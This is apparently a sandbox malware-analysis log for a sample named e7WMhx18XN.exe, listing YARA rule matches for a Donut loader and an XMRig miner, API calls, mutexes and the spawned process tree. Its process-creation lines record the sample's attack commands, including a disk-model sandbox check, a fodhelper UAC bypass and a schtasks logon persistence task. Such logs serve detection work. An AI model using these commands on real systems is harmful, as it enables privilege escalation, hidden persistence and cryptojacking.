        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
        Source: C:\Windows\System32\dllhost.exe | Code function: 94_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 94_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exe | Code function: 95_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 95_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exe | Code function: 97_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 97_2_0000000140002D4C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 56_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 56_2_004011AD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 56_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 56_2_004017A5
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e7WMhx18XN.exe.log
        Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6140
        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2712:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5304:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\00513a1e-7249-4c11-a0ce-fe6099077778
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe | File created: C:\Users\user\AppData\Local\Temp\b.bat
        Source: C:\Users\user\Desktop\e7WMhx18XN.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
        Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\explorer.exe
        Source: e7WMhx18XN.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e7WMhx18XN.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Windows\System32\findstr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: e7WMhx18XN.exeReversingLabs: Detection: 52%
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: unknownProcess created: C:\Users\user\Desktop\e7WMhx18XN.exe "C:\Users\user\Desktop\e7WMhx18XN.exe"
        Source: unknownProcess created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeProcess created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeProcess created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\paint.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
